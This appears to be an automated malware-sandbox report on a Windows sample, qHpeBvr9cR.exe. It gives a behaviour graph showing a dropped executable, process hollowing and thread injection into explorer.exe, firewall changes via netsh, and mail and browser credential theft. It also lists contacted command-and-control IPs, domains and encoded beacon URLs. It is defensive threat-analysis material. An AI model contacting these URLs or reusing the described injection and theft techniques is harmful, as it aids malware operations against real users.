Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756313 Sample: qHpeBvr9cR.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 30 www.19t221013d.tokyo 2->30 46 Snort IDS alert for network traffic 2->46 48 Multi AV Scanner detection for domain / URL 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 5 other signatures 2->52 10 qHpeBvr9cR.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\...\febcldoukq.exe, PE32 10->28 dropped 13 febcldoukq.exe 10->13         started        process6 signatures7 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 70 Maps a DLL or memory area into another process 13->70 16 febcldoukq.exe 13->16         started        process8 signatures9 38 Modifies the context of a thread in another process (thread injection) 16->38 40 Maps a DLL or memory area into another process 16->40 42 Sample uses process hollowing technique 16->42 44 Queues an APC in another process (thread injection) 16->44 19 explorer.exe 16->19 injected process10 dnsIp11 32 www.afterdarksocial.club 162.214.129.149, 49711, 49712, 80 UNIFIEDLAYER-AS-1US United States 19->32 34 eufidelizo.com 192.185.217.47, 49707, 80 UNIFIEDLAYER-AS-1US United States 19->34 36 4 other IPs or domains 19->36 54 System process connects to network (likely due to code injection or exploit) 19->54 56 Uses netsh to modify the Windows network and firewall settings 19->56 23 netsh.exe 13 19->23         started        26 autochk.exe 19->26         started        signatures12 process13 signatures14 58 Tries to steal Mail credentials (via file / registry access) 23->58 60 Tries to harvest and steal browser information (history, passwords, etc) 23->60 62 Modifies the context of a thread in another process (thread injection) 23->62 64 Maps a DLL or memory area into another process 23->64
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.185.217.47
 eufidelizo.com United States
46606 UNIFIEDLAYER-AS-1US true
206.233.197.135
 www.lyonfinancialusa.com United States
174 COGENT-174US true
155.159.61.221
 www.patrickguarte.com South Africa
137951 CLAYERLIMITED-AS-APClayerLimitedHK true
162.214.129.149
 www.afterdarksocial.club United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
www.patrickguarte.com 155.159.61.221 true
eufidelizo.com 192.185.217.47 true
www.lyonfinancialusa.com 206.233.197.135 true
www.afterdarksocial.club 162.214.129.149 true
www.eufidelizo.com unknown unknown
www.19t221013d.tokyo unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.lyonfinancialusa.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X true
  • Avira URL Cloud: malware
 unknown
http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X true
  • Avira URL Cloud: malware
 unknown
http://www.patrickguarte.com/henz/ true
  • Avira URL Cloud: malware
 unknown
http://www.afterdarksocial.club/henz/ true
  • Avira URL Cloud: malware
 unknown
www.brennancorps.info/henz/ true
  • Avira URL Cloud: malware
 low